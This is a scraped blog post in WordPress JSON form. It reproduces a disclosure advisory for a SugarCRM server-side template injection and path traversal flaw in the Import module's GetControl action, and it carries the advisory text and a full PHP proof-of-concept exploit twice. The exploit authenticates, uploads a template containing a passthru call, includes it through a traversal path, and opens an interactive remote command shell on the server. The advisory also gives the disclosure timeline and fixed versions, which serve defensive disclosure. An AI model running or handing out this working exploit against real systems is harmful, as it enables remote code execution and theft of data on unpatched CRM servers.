—————————————————————————-\nSugarCRM <= 13.0.1 (GetControl) Server-Side Template Injection\nVulnerability\n—————————————————————————-<\/p>\n[-] Software Link:<\/p>\n
Home<\/a><\/p><\/blockquote>\n<\/iframe><\/p>\n[-] Affected Versions:<\/p>\n<p>Version 13.0.1 and prior versions.<br \/>\nVersion 12.0.3 and prior versions.<\/p>\n[-] Vulnerability Description:<\/p>\n<p>There is a sort of Server-Side Template Injection (SSTI) vulnerability<br \/>\naffecting<br \/>\nthe “GetControl” action from the “Import” module. User input passed<br \/>\nthrough the<br \/>\n“field_name” parameter is not properly sanitized before being used to<br \/>\nconstruct<br \/>\nthe path of the template to include. As such, this can be abused to<br \/>\ninclude and<br \/>\nexecute arbitrary PHP code through Path Traversal attacks.<\/p>\n[-] Proof of Concept:<\/p>\n<p>https:\/\/karmainsecurity.com\/pocs\/KIS-2023-10.php<\/p>\n<p>(Packet Storm note: POC included at bottom)<\/p>\n[-] Solution:<\/p>\n<p>Upgrade to version 13.0.2, 12.0.4, or later.<\/p>\n[-] Disclosure Timeline:<\/p>\n[23\/04\/2023] – Vendor notified<br \/>\n[21\/09\/2023] – Fixed versions released<br \/>\n[06\/10\/2023] – CVE identifier requested<br \/>\n[26\/10\/2023] – Publication of this advisory<\/p>\n[-] CVE Reference:<\/p>\n<p>The Common Vulnerabilities and Exposures project (cve.mitre.org)<br \/>\nhas not assigned a CVE identifier for this vulnerability.<\/p>\n[-] Credits:<\/p>\n<p>Vulnerability discovered by Egidio Romano.<\/p>\n[-] Original Advisory:<\/p>\n<p>https:\/\/karmainsecurity.com\/KIS-2023-10<\/p>\n[-] Other References:<\/p>\n<p>https:\/\/support.sugarcrm.com\/resources\/security\/sugarcrm-sa-2023-010\/<\/p>\n<p>— KIS-2023-10.php poc —<\/p>\n<p><?php<\/p>\n<p>set_time_limit(0);<br \/>\nerror_reporting(E_ERROR);<\/p>\n<p>if (!extension_loaded(“curl”)) die(“[+] cURL extension required!\\n”);<\/p>\n<p>if ($argc != 4) die(“Usage: php $argv[0] <URL> <username> <password>\\n”);<\/p>\n<p>list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];<\/p>\n<p>print “[+] Logging in with username ‘{$user}’ and password ‘{$pass}’\\n”;<\/p>\n<p>$ch = curl_init();<\/p>\n<p>$params = [“username” => $user, “password” => $pass, “grant_type” => “password”, “client_id” => “sugar”];<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}rest\/v10\/oauth2\/token”);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“Content-Type: application\/json”]);<br \/>\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<\/p>\n<p>if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die(“[+] Login failed!\\n”);<\/p>\n<p>print “[+] Creating new Notes bean\\n”;<\/p>\n<p>$note_id = time().”.tpl”;<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}rest\/v10\/Notes”);<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“Content-Type: application\/json”, “OAuth-Token: {$token}”]);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([“id” => $note_id]));<\/p>\n<p>if (!preg_match(‘\/”id”:”‘.$note_id.'”\/’, curl_exec($ch))) die(“[+] Bean creation failed!\\n”);<\/p>\n<p>require_once(“.\/lib\/nusoap.php”);<br \/>\n$client = new nusoap_client(“{$url}soap.php”, false);<\/p>\n<p>if (($err = $client->getError()))<br \/>\n{<br \/>\necho “\\nConstructor error: $err”;<br \/>\necho “\\nDebug: ” . $client->getDebug() . “\\n”;<br \/>\ndie();<br \/>\n}<\/p>\n<p>print “[+] Sending SOAP login request\\n”;<\/p>\n<p>$params = [“user_auth” => [“user_name” => $user, “password” => $pass]];<br \/>\n$session = $client->call(‘login’, $params);<\/p>\n<p>if ($session[‘id’] == -1) die(“[+] SOAP login failed!\\n”);<\/p>\n<p>print “[+] Uploading template through ‘set_note_attachment’\\n”;<\/p>\n<p>$params = [“session” => $session[‘id’], “note” => [“id” => $note_id, “file” => base64_encode(“{php}passthru(\\$_SERVER[‘HTTP_CMD’]);{\/php}”)]];<\/p>\n<p>$result = $client->call(“set_note_attachment”, $params);<\/p>\n<p>print “[+] Getting PHPSESSID through BWC login\\n”;<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}rest\/v10\/oauth2\/bwc\/login”);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([]));<br \/>\ncurl_setopt($ch, CURLOPT_HEADER, true);<\/p>\n<p>if (!preg_match(“\/PHPSESSID=([^;]+);\/”, curl_exec($ch), $sid)) die(“[-] Session ID not found!\\n”);<\/p>\n<p>print “[+] Launching shell\\n”;<\/p>\n<p>$note_id = substr($note_id, 0, -4);<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}index.php?module=Import&action=GetControl&import_module=Bugs&field_name=\/test”);<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“Cookie: PHPSESSID={$sid[1]}”]);<br \/>\ncurl_setopt($ch, CURLOPT_POST, false);<br \/>\ncurl_setopt($ch, CURLOPT_HEADER, false);<\/p>\n<p>curl_exec($ch);<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}index.php?module=Import&action=GetControl&import_module=Bugs&field_name=\/..\/..\/..\/..\/upload\/{$note_id}”);<\/p>\n<p>while(1)<br \/>\n{<br \/>\nprint “\\nsugar-shell# “;<br \/>\nif (($cmd = trim(fgets(STDIN))) == “exit”) break;<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“CMD: “.$cmd, “Cookie: PHPSESSID={$sid[1]}”]);<br \/>\n($r = curl_exec($ch)) ? print $r : die(“\\n[+] Exploit failed!\\n”);<br \/>\n}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>—————————————————————————- SugarCRM <= 13.0.1 (GetControl) Server-Side Template Injection Vulnerability —————————————————————————- [-] Software Link: Home [-] Affected Versions: Version 13.0.1 and prior versions. Version 12.0.3 and prior versions. [-] Vulnerability Description: There is a sort of Server-Side Template Injection (SSTI) vulnerability affecting the “GetControl” action from the “Import” module. User input passed through the “field_name” parameter …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-50656","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50656"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50656\/revisions"}],"predecessor-version":[{"id":50762,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50656\/revisions\/50762"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
<\/iframe><\/p>\n[-] Affected Versions:<\/p>\n<p>Version 13.0.1 and prior versions.<br \/>\nVersion 12.0.3 and prior versions.<\/p>\n[-] Vulnerability Description:<\/p>\n<p>There is a sort of Server-Side Template Injection (SSTI) vulnerability<br \/>\naffecting<br \/>\nthe “GetControl” action from the “Import” module. User input passed<br \/>\nthrough the<br \/>\n“field_name” parameter is not properly sanitized before being used to<br \/>\nconstruct<br \/>\nthe path of the template to include. As such, this can be abused to<br \/>\ninclude and<br \/>\nexecute arbitrary PHP code through Path Traversal attacks.<\/p>\n[-] Proof of Concept:<\/p>\n<p>https:\/\/karmainsecurity.com\/pocs\/KIS-2023-10.php<\/p>\n<p>(Packet Storm note: POC included at bottom)<\/p>\n[-] Solution:<\/p>\n<p>Upgrade to version 13.0.2, 12.0.4, or later.<\/p>\n[-] Disclosure Timeline:<\/p>\n[23\/04\/2023] – Vendor notified<br \/>\n[21\/09\/2023] – Fixed versions released<br \/>\n[06\/10\/2023] – CVE identifier requested<br \/>\n[26\/10\/2023] – Publication of this advisory<\/p>\n[-] CVE Reference:<\/p>\n<p>The Common Vulnerabilities and Exposures project (cve.mitre.org)<br \/>\nhas not assigned a CVE identifier for this vulnerability.<\/p>\n[-] Credits:<\/p>\n<p>Vulnerability discovered by Egidio Romano.<\/p>\n[-] Original Advisory:<\/p>\n<p>https:\/\/karmainsecurity.com\/KIS-2023-10<\/p>\n[-] Other References:<\/p>\n<p>https:\/\/support.sugarcrm.com\/resources\/security\/sugarcrm-sa-2023-010\/<\/p>\n<p>— KIS-2023-10.php poc —<\/p>\n<p><?php<\/p>\n<p>set_time_limit(0);<br \/>\nerror_reporting(E_ERROR);<\/p>\n<p>if (!extension_loaded(“curl”)) die(“[+] cURL extension required!\\n”);<\/p>\n<p>if ($argc != 4) die(“Usage: php $argv[0] <URL> <username> <password>\\n”);<\/p>\n<p>list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];<\/p>\n<p>print “[+] Logging in with username ‘{$user}’ and password ‘{$pass}’\\n”;<\/p>\n<p>$ch = curl_init();<\/p>\n<p>$params = [“username” => $user, “password” => $pass, “grant_type” => “password”, “client_id” => “sugar”];<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}rest\/v10\/oauth2\/token”);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“Content-Type: application\/json”]);<br \/>\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<\/p>\n<p>if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die(“[+] Login failed!\\n”);<\/p>\n<p>print “[+] Creating new Notes bean\\n”;<\/p>\n<p>$note_id = time().”.tpl”;<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}rest\/v10\/Notes”);<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“Content-Type: application\/json”, “OAuth-Token: {$token}”]);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([“id” => $note_id]));<\/p>\n<p>if (!preg_match(‘\/”id”:”‘.$note_id.'”\/’, curl_exec($ch))) die(“[+] Bean creation failed!\\n”);<\/p>\n<p>require_once(“.\/lib\/nusoap.php”);<br \/>\n$client = new nusoap_client(“{$url}soap.php”, false);<\/p>\n<p>if (($err = $client->getError()))<br \/>\n{<br \/>\necho “\\nConstructor error: $err”;<br \/>\necho “\\nDebug: ” . $client->getDebug() . “\\n”;<br \/>\ndie();<br \/>\n}<\/p>\n<p>print “[+] Sending SOAP login request\\n”;<\/p>\n<p>$params = [“user_auth” => [“user_name” => $user, “password” => $pass]];<br \/>\n$session = $client->call(‘login’, $params);<\/p>\n<p>if ($session[‘id’] == -1) die(“[+] SOAP login failed!\\n”);<\/p>\n<p>print “[+] Uploading template through ‘set_note_attachment’\\n”;<\/p>\n<p>$params = [“session” => $session[‘id’], “note” => [“id” => $note_id, “file” => base64_encode(“{php}passthru(\\$_SERVER[‘HTTP_CMD’]);{\/php}”)]];<\/p>\n<p>$result = $client->call(“set_note_attachment”, $params);<\/p>\n<p>print “[+] Getting PHPSESSID through BWC login\\n”;<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}rest\/v10\/oauth2\/bwc\/login”);<br \/>\ncurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([]));<br \/>\ncurl_setopt($ch, CURLOPT_HEADER, true);<\/p>\n<p>if (!preg_match(“\/PHPSESSID=([^;]+);\/”, curl_exec($ch), $sid)) die(“[-] Session ID not found!\\n”);<\/p>\n<p>print “[+] Launching shell\\n”;<\/p>\n<p>$note_id = substr($note_id, 0, -4);<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}index.php?module=Import&action=GetControl&import_module=Bugs&field_name=\/test”);<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“Cookie: PHPSESSID={$sid[1]}”]);<br \/>\ncurl_setopt($ch, CURLOPT_POST, false);<br \/>\ncurl_setopt($ch, CURLOPT_HEADER, false);<\/p>\n<p>curl_exec($ch);<\/p>\n<p>curl_setopt($ch, CURLOPT_URL, “{$url}index.php?module=Import&action=GetControl&import_module=Bugs&field_name=\/..\/..\/..\/..\/upload\/{$note_id}”);<\/p>\n<p>while(1)<br \/>\n{<br \/>\nprint “\\nsugar-shell# “;<br \/>\nif (($cmd = trim(fgets(STDIN))) == “exit”) break;<br \/>\ncurl_setopt($ch, CURLOPT_HTTPHEADER, [“CMD: “.$cmd, “Cookie: PHPSESSID={$sid[1]}”]);<br \/>\n($r = curl_exec($ch)) ? print $r : die(“\\n[+] Exploit failed!\\n”);<br \/>\n}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>—————————————————————————- SugarCRM <= 13.0.1 (GetControl) Server-Side Template Injection Vulnerability —————————————————————————- [-] Software Link: Home [-] Affected Versions: Version 13.0.1 and prior versions. Version 12.0.3 and prior versions. [-] Vulnerability Description: There is a sort of Server-Side Template Injection (SSTI) vulnerability affecting the “GetControl” action from the “Import” module. User input passed through the “field_name” parameter …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-50656","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50656"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50656\/revisions"}],"predecessor-version":[{"id":50762,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50656\/revisions\/50762"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}